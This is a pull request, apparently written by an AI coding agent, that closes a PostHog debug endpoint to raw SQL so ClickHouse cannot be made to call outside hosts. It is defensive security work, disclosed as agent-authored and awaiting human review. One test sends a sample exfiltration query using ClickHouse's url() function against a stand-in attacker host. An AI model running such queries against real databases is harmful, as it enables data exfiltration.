### PR TITLE
fix(debug): profile queries by id instead of raw SQL

### DIFF
--- a/frontend/src/lib/components/AppShortcuts/utils/DebugCHQueries.tsx
+++ b/frontend/src/lib/components/AppShortcuts/utils/DebugCHQueries.tsx
@@ -85,7 +85,7 @@ const debugCHQueriesLogic = kea<debugCHQueriesLogicType>([
     path(['lib', 'components', 'CommandPalette', 'DebugCHQueries']),
     actions({
         setPathFilter: (path: string | null) => ({ path }),
-        runProfile: (query: string) => ({ query }),
+        runProfile: (queryId: string, query: string) => ({ queryId, query }),
     }),
     reducers({
         pathFilter: [
@@ -121,9 +121,9 @@ const debugCHQueriesLogic = kea<debugCHQueriesLogicType>([
         profilingResult: [
             null as ProfilingResult | null,
             {
-                runProfile: async ({ query }: { query: string }) => {
+                runProfile: async ({ queryId, query }: { queryId: string; query: string }) => {
                     const { profile_query_id, execution_time_ms } = await api.create('api/debug_ch_queries/profile/', {
-                        query,
+                        query_id: queryId,
                     })
 
                     const maxAttempts = 10
@@ -535,7 +535,7 @@ export function DebugCHQueries({ insightId, experimentId }: DebugCHQueriesProps)
                                             center
                                             icon={<IconSearch />}
                                             loading={profilingResultLoading && profilingQuerySql === item.query}
-                                            onClick={() => runProfile(item.query)}
+                                            onClick={() => runProfile(item.query_id, item.query)}
                                             className="my-0"
                                         >
                                             Profile this query

--- a/posthog/api/debug_ch_queries.py
+++ b/posthog/api/debug_ch_queries.py
@@ -420,14 +420,45 @@ class DebugCHQueries(viewsets.ViewSet):
             ]
         )
 
+    def _lookup_query_by_id(self, query_id: str) -> Optional[str]:
+        # Profiling re-executes the original SQL. Looking it up from system.query_log
+        # rather than accepting raw SQL keeps client.execute off arbitrary input —
+        # readonly=2 still permits url()/file()/s3()/remote() table functions, which
+        # would otherwise allow ClickHouse-initiated egress.
+        response = sync_execute(
+            """
+            SELECT argMax(query, type) AS query
+            FROM clusterAllReplicas(%(cluster)s, system, query_log)
+            WHERE
+                query_id = %(query_id)s
+                AND is_initial_query
+                AND query NOT LIKE %(not_query)s
+                AND event_time > now() - INTERVAL 14 DAY
+            GROUP BY query_id
+            SETTINGS skip_unavailable_shards=1
+            """,
+            {
+                "cluster": CLICKHOUSE_CLUSTER,
+                "query_id": query_id,
+                "not_query": "%request:_api_debug_ch_queries_%",
+            },
+        )
+        if not response:
+            return None
+        return response[0][0]
+
     @action(detail=False, methods=["POST"])
     def profile(self, request):
         if not request.user.is_staff:
             raise exceptions.PermissionDenied("Only staff users can profile queries.")
 
-        query = request.data.get("query", "").strip()
+        query_id = request.data.get("query_id", "").strip()
+        if not query_id:
+            raise exceptions.ValidationError("No query_id provided.")
+
+        query = self._lookup_query_by_id(query_id)
         if not query:
-            raise exceptions.ValidationError("No query provided.")
+            raise exceptions.ValidationError("Query not found in system.query_log.")
 
         profile_query_id = f"profile_{generate_short_id()}"
 

--- a/posthog/api/test/test_debug_ch_queries.py
+++ b/posthog/api/test/test_debug_ch_queries.py
@@ -34,30 +34,55 @@ class TestDebugCHQueryProfile(APIBaseTest):
     def test_non_staff_gets_403(self):
         self.user.is_staff = False
         self.user.save()
-        resp = self.client.post("/api/debug_ch_queries/profile/", {"query": "SELECT 1"}, format="json")
+        resp = self.client.post("/api/debug_ch_queries/profile/", {"query_id": "abc"}, format="json")
         self.assertEqual(resp.status_code, HTTP_403_FORBIDDEN)
 
-    def test_rejects_empty_query(self):
+    def test_rejects_empty_query_id(self):
         self.user.is_staff = True
         self.user.save()
-        resp = self.client.post("/api/debug_ch_queries/profile/", {"query": ""}, format="json")
+        resp = self.client.post("/api/debug_ch_queries/profile/", {"query_id": ""}, format="json")
         self.assertEqual(resp.status_code, HTTP_400_BAD_REQUEST)
 
-    @patch("posthog.api.debug_ch_queries.get_client_from_pool")
-    def test_returns_profile_query_id(self, mock_get_client):
+    def test_ignores_raw_query_field(self):
         self.user.is_staff = True
         self.user.save()
+        resp = self.client.post(
+            "/api/debug_ch_queries/profile/",
+            {"query": "SELECT * FROM url('https://attacker/', 'CSV', 'x String')"},
+            format="json",
+        )
+        self.assertEqual(resp.status_code, HTTP_400_BAD_REQUEST)
+
+    @patch("posthog.api.debug_ch_queries.sync_execute")
+    def test_rejects_unknown_query_id(self, mock_sync_execute):
+        self.user.is_staff = True
+        self.user.save()
+        mock_sync_execute.return_value = []
+
+        resp = self.client.post("/api/debug_ch_queries/profile/", {"query_id": "unknown"}, format="json")
+        self.assertEqual(resp.status_code, HTTP_400_BAD_REQUEST)
+
+    @patch("posthog.api.debug_ch_queries.sync_execute")
+    @patch("posthog.api.debug_ch_queries.get_client_from_pool")
+    def test_returns_profile_query_id(self, mock_get_client, mock_sync_execute):
+        self.user.is_staff = True
+        self.user.save()
+
+        mock_sync_execute.return_value = [("SELECT 1",)]
 
         mock_client = MagicMock()
         mock_get_client.return_value.__enter__ = MagicMock(return_value=mock_client)
         mock_get_client.return_value.__exit__ = MagicMock(return_value=False)
 
-        resp = self.client.post("/api/debug_ch_queries/profile/", {"query": "SELECT 1"}, format="json")
+        resp = self.client.post("/api/debug_ch_queries/profile/", {"query_id": "abc123"}, format="json")
         self.assertEqual(resp.status_code, HTTP_200_OK)
         data = resp.json()
         self.assertIn("profile_query_id", data)
         self.assertIn("execution_time_ms", data)
         self.assertTrue(data["profile_query_id"].startswith("profile_"))
+
+        executed_sql = mock_client.execute.call_args.args[0]
+        self.assertEqual(executed_sql, "SELECT 1")
 
 
 class TestDebugCHQueryProfileResults(APIBaseTest):


### PR DESCRIPTION
## Problem

The `/api/debug_ch_queries/profile/` endpoint added in #52210 takes raw SQL from the request body and runs it against ClickHouse. The endpoint is staff-only and uses `readonly=2`, but `readonly=2` still permits ClickHouse table functions like `url()`, `file()`, `s3()`, `remote()`, and `mysql()` — which can initiate outbound network requests from the database server. A staff session is therefore enough to coerce ClickHouse itself into making arbitrary HTTP calls (e.g. for data exfiltration), regardless of any client-side controls.

The frontend was already only ever profiling queries surfaced from `system.query_log`, so the legitimate input shape is a `query_id`, not user-typed SQL.

## Changes

- `profile/` now accepts `query_id` and looks up the original SQL from `system.query_log` server-side, filtered by `is_initial_query`, the existing self-exclusion guard (`%request:_api_debug_ch_queries_%`), and a 14-day window — matching the rest of the file. Returns `400` when the id is missing or not present in `query_log`.
- The fetched SQL is what's passed to `client.execute()`. There is no path for an attacker-controlled string to reach the executor.
- Frontend `runProfile` now posts `{ query_id }`. The SQL string still flows through the kea action so the loading-state and result keying continue to work unchanged.

## How did you test this code?

I'm an agent (Claude). Automated tests only — I did not perform manual testing.

- `hogli test posthog/api/test/test_debug_ch_queries.py` — 10 passed.
- New tests:
  - rejects unknown `query_id` (400)
  - rejects requests that send the old `query` field (400) — directly exercises the previous exfiltration payload form
  - asserts the SQL passed to `client.execute()` is the SQL returned by the `query_log` lookup, not anything from the request body
- Existing 403 (non-staff), 400 (empty input), and success-path tests updated to use the new `query_id` field.
- TypeScript check on `DebugCHQueries.tsx` produced no new errors.

## Publish to changelog?

no

## Docs update

n/a

## 🤖 Agent context

- Tool: Claude Code (Opus 4.7), invoked by @andyzzhao after a security report flagged the endpoint introduced in #52210.
- Key decisions:
  - Picked the `query_id` lookup over a SQL deny-list because `readonly=2` doesn't restrict table functions and the legitimate caller (the debug modal) already had `query_id` available on every row.
  - Kept the existing `query_log` filters (`is_initial_query`, the `not_query` self-exclusion, 14-day window) consistent with the rest of `debug_ch_queries.py`.
  - Did not add `@extend_schema` to the action — none of the other actions in this ViewSet have schema annotations, and broadening that is a separate cleanup.
- Verified: backend tests pass; `tsc --noEmit` reports no new errors on the affected frontend file.
- Agent-authored — needs human review before merge.